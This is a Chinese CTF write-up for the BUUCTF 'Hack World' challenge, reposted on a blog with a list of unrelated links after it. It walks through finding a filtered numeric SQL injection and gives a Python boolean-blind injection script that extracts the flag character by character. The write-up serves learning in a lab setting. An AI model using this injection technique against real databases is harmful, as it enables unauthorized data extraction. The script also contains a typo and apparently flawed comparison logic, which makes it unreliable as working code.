当前位置: 首页 > news >正文

BUUCTF [CISCN2019 华北赛区 Day2 Web1] Hack World

1、通过题目,可以知道该题目为SQL注入类型:

2、判断注入类型为数字注入:

3、通过BP抓包,来判断注入点。

字典爆破发现常规的注入方式都被过滤。

4、因此可以尝试通过布尔盲注的方式来得到flag。编写脚本得到flag

import requests

url = "http://977ba0f7-8772-4617-9600-8089c3d7e1e3.node5.buuoj.cn:81/index.php"
result = ""
for i in range(1, 50):
        for j in range(32, 128):
                payload = "(ascii(substr((select(flag)from(flag)),{m},1))>{n})"
                response = requests.post(url=url, data={'id': payload.format(m=i, n=j)})
# {m} 是当前正在提取的 flag 字符位置,{n} 是 ASCII 码值,用于比较。
                f response.text.find('girl') == -1:
                        result += chr(j)
                        print(j)
                        break
        print("正在输出flag:", result)
print("flag:", result)

#外层循环 (for i in range(1, 50)):循环遍历 flag 的每个字符位置,假设 flag 最长为 50 个字符。
#内层循环 (for j in range(32, 128)):循环遍历 ASCII 字符集中的可打印字符(从空格到 '~')。
#payload 变量:构造了一个 SQL 注入 payload,使用 substr() 函数逐个提取 flag 的字符,并通过 ascii() 函数转换为 ASCII 码值,然后与 j 比较。

5、得到flag:

http://www.lryc.cn/news/381873.html

相关文章:

  • wsl2平台鸿蒙全仓docker编译环境快速创建方法
  • 商业秘密侵权
  • 高通安卓12-固件升级
  • 我的常见问题记录
  • Python 3.12 环境搭建(Windows版)
  • 植物大战僵尸杂交版如何手动修改金币钻石数
  • Salia PLCC cPH2 远程命令执行漏洞(CVE-2023-46359)
  • 路由表操作
  • 羊大师:拒绝心灵内耗:走向高效与平和
  • IOS Swift 从入门到精通:Swift 简介,Swift中变量和常量,Swift中字符串,Swift中整数和浮点数
  • 聚焦AIoT最后一公里:EasyCVR+AI视频技术在各领域的创新应用
  • 怎样利用 Groovy 的元编程特性来创建自定义的 DSL(领域特定语言)?
  • 自动预约申购 i茅台工具完善
  • Jitter Injection详解
  • 基于SSM+Jsp的校园餐厅管理
  • 无线麦克风哪个品牌音质最好,一文告诉你无线领夹麦克风怎么挑选
  • Docker配置国内镜像加速-2
  • 前后端分离项目面试总结
  • 力扣刷题笔记
  • 【JS逆向百例】某点数据逆向分析,多方法详解
  • windows系统docker镜像导出
  • selenium前期准备
  • [Python人工智能] 四十六.PyTorch入门 (1)环境搭建、神经网络普及和Torch基础知识
  • 示例:推荐一个应用Adorner做的通知和提示消息对话框
  • nvdiadocker相关配置S3Gaussian
  • 【科技前沿】电子设计新贵SmartEDA:为何它引领行业风潮?
  • 免费悬浮翻译器哪个好?测评5款悬浮翻译器
  • 压缩文件解压方法总结
  • 探索Elastic Search:强大的开源搜索引擎,详解及使用
  • vue中的代码分割